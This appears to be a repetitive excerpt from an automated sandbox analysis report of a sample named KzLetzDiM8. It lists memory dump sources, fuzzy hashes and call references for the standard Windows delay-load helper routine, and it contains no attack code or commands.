                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 55ee45059415f9f4cab4a2951499750ea6339690cd09ef85ed1b6ff3db1a3ca5
                                                            • Instruction ID: 72b5531473b81d1664b963f01cee15f6234d91d1669a3f41fad87c50576580ee
                                                            • Opcode Fuzzy Hash: 55ee45059415f9f4cab4a2951499750ea6339690cd09ef85ed1b6ff3db1a3ca5
                                                            • Instruction Fuzzy Hash: 88B012D52BD144BC311CB1061C02C3702CEC5D1B20330403EF90FC0090D9806C500431
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE1E3
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: e3d4f9807c9e62ffad005ff1df8beac3d6c8f677743e2d3df870deda373b23cd
                                                            • Instruction ID: 4870d602428bd450cca9be38418f735e7da0d9d7acfcca05172e544060e6fdc3
                                                            • Opcode Fuzzy Hash: e3d4f9807c9e62ffad005ff1df8beac3d6c8f677743e2d3df870deda373b23cd
                                                            • Instruction Fuzzy Hash: 71B012E52BC104BC311CB1061D02C3742CDC0D1B20330403EF90ED4090DD416D510831
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE1E3
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 36cbeb0c3922e47f926319a0ffb56410b270d6a066ed7d0f779ae68ebffb5106
                                                            • Instruction ID: 82f06c0ee707c506ab564bc0d0e3b101bf7af7f8549222614247c014e90c31dd
                                                            • Opcode Fuzzy Hash: 36cbeb0c3922e47f926319a0ffb56410b270d6a066ed7d0f779ae68ebffb5106
                                                            • Instruction Fuzzy Hash: 6CB012D52BC104BC312CB1061C03C7702CDC0D5B20330443EF90EC00D0D9406C500431
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE3FC
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: e6cab2d07e4400d9a7ae5276fd2957790b11e62e004c7182b5c85785554e3b5d
                                                            • Instruction ID: 49e06912bbc93b78454a46466598fb76453244487f27ac9f49ff139ea8b47c8e
                                                            • Opcode Fuzzy Hash: e6cab2d07e4400d9a7ae5276fd2957790b11e62e004c7182b5c85785554e3b5d
                                                            • Instruction Fuzzy Hash: 6DB012E62B82947C330CE1041D06C7702CCC0D1B30331D12EF705C1094D9400C6A0433
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE3FC
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 2c96178a7bf9b36e53b7e076ada93e98d78abfff15e7708c83b9baf6f1270f86
                                                            • Instruction ID: 68b26378ec9cf6e40cf7752fdc3e444d26843787ac07b6fd9a3b1e91990ca8de
                                                            • Opcode Fuzzy Hash: 2c96178a7bf9b36e53b7e076ada93e98d78abfff15e7708c83b9baf6f1270f86
                                                            • Instruction Fuzzy Hash: 2CB012F52B8284BC310CE1041C06C3702CCC0E1F30331922EF905C1094D9404E610433
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE3FC
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 874d693e1cc93205e187ca266cf9462aade97d0ac4f6b7122cd4572f2ddc0949
                                                            • Instruction ID: ff15ee854c9501db14552c8c018321c7ae1143fcb74a8aca5ea5e212136ad77d
                                                            • Opcode Fuzzy Hash: 874d693e1cc93205e187ca266cf9462aade97d0ac4f6b7122cd4572f2ddc0949
                                                            • Instruction Fuzzy Hash: 41B012E62B8284BC320CE1041C06C3702CCC0D1B30331D12EFA05C1094D9404C650433
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE51F
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 4ff6ab25797f9fdbd335734d3943d29c1064cb2acfdc5d9cb4f9fcc13d49f2d5
                                                            • Instruction ID: 0341d47f3954f81aa66b002baf64116b09e8bd4f8dc24b459a17bad4794f7d25
                                                            • Opcode Fuzzy Hash: 4ff6ab25797f9fdbd335734d3943d29c1064cb2acfdc5d9cb4f9fcc13d49f2d5
                                                            • Instruction Fuzzy Hash: 65B012C96B91447C310C71241C06C3B018CC4E2F20330513EF511C04A6E9404D540471
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE51F
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: e80b205edb6f5090069787152e38a319272a5fd484d93b803c5f3adc4f60604f
                                                            • Instruction ID: 6643563a80f2c6f6290b7eb868d969ae688ad685ebf89ac281cb818e3efc84fa
                                                            • Opcode Fuzzy Hash: e80b205edb6f5090069787152e38a319272a5fd484d93b803c5f3adc4f60604f
                                                            • Instruction Fuzzy Hash: EBB012C96B91447D310CB1081C02D3B01CCC0D2F20330512EF505C00A5E9404C500471
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE51F
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 58dd54e823aa29ace376d41d2056095a985ef344c526afb09778f28b7b7aac3c
                                                            • Instruction ID: 511c9a2da49fa08afdd0ff5ddff13efec427255d307101d69eb362f7db2a4ed5
                                                            • Opcode Fuzzy Hash: 58dd54e823aa29ace376d41d2056095a985ef344c526afb09778f28b7b7aac3c
                                                            • Instruction Fuzzy Hash: 11B012C96B91847C320CB1081D02C3B05CCC0D2F20330912EF605C00A5E9404C510471
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE51F
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 31d25d912cc6a02ba8dd87999ed8dd38f5542d4740d508eaefc59da19684c0ef
                                                            • Instruction ID: 1a2e79caa2639fed845ce605482ec0d32469a8f100dbd75ea01f948bd86b583b
                                                            • Opcode Fuzzy Hash: 31d25d912cc6a02ba8dd87999ed8dd38f5542d4740d508eaefc59da19684c0ef
                                                            • Instruction Fuzzy Hash: 3BB012C96B96447C320CB1085C03C3B01CCC0D2F20330532EF505C00A5EA404C940471
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE580
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 42fa0fac7629c43e498d080b8aefa6050a0835d379db1eac0b145e3e1d06ace6
                                                            • Instruction ID: 1a26c54a74a8054c7715f623836847689bc952514ff390661c7c701a5aea467b
                                                            • Opcode Fuzzy Hash: 42fa0fac7629c43e498d080b8aefa6050a0835d379db1eac0b145e3e1d06ace6
                                                            • Instruction Fuzzy Hash: DDB012C92FC24C7D310CA1541C02C3701CCC0D1B20331403EF50DC50A4E9400C600831
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE580
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 5ea053ae3516d00e772ddac32fca45e56567c1a7b7569141b5181bfd880745e6
                                                            • Instruction ID: 5d836886751669589bb6d8a1d2d0dcb691c854d0296023b8acef23cd75031f4d
                                                            • Opcode Fuzzy Hash: 5ea053ae3516d00e772ddac32fca45e56567c1a7b7569141b5181bfd880745e6
                                                            • Instruction Fuzzy Hash: 53B012C92FC3487C314CA1545C03C3701DCC0D1B20331423EF50DC50A4EA400CA00831
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE580
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 5e8f1a640e3f6651218e329af3e4e519371750d9f3877b2fb24ea32e6d863770
                                                            • Instruction ID: 11f4d3d1c97106d2875276b8ac23a36df7b55029fc8934bbb639ee60238ca889
                                                            • Opcode Fuzzy Hash: 5e8f1a640e3f6651218e329af3e4e519371750d9f3877b2fb24ea32e6d863770
                                                            • Instruction Fuzzy Hash: F7B012C92FC2487C310CA1545D02C3701DCC0D1B20331423EF50DC50A4EE400D610831
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE1E3
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 6fcccbaf64919e1300b60cf60d1a697068fcdb9c41df584132036839bd1c6c0f
                                                            • Instruction ID: debead5ea354b3354a455c32ecec9937a27802f8154d89977bb0bb825890c725
                                                            • Opcode Fuzzy Hash: 6fcccbaf64919e1300b60cf60d1a697068fcdb9c41df584132036839bd1c6c0f
                                                            • Instruction Fuzzy Hash: 1BA011EA2AC20ABC302832022C02C3B028EC0E2BA0330882EFA03C00A0AA8028800830
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE1E3
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 287408f1180ef44f3af1ce037aa32cedb073ebc7226d61d58d4ffb99d6b2e813
                                                            • Instruction ID: debead5ea354b3354a455c32ecec9937a27802f8154d89977bb0bb825890c725
                                                            • Opcode Fuzzy Hash: 287408f1180ef44f3af1ce037aa32cedb073ebc7226d61d58d4ffb99d6b2e813
                                                            • Instruction Fuzzy Hash: 1BA011EA2AC20ABC302832022C02C3B028EC0E2BA0330882EFA03C00A0AA8028800830
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE1E3
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 240db9eea2c597a4016688d741b02ee0b25302e0fe4c6f56943c28eba201df08
                                                            • Instruction ID: debead5ea354b3354a455c32ecec9937a27802f8154d89977bb0bb825890c725
                                                            • Opcode Fuzzy Hash: 240db9eea2c597a4016688d741b02ee0b25302e0fe4c6f56943c28eba201df08
                                                            • Instruction Fuzzy Hash: 1BA011EA2AC20ABC302832022C02C3B028EC0E2BA0330882EFA03C00A0AA8028800830
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE1E3
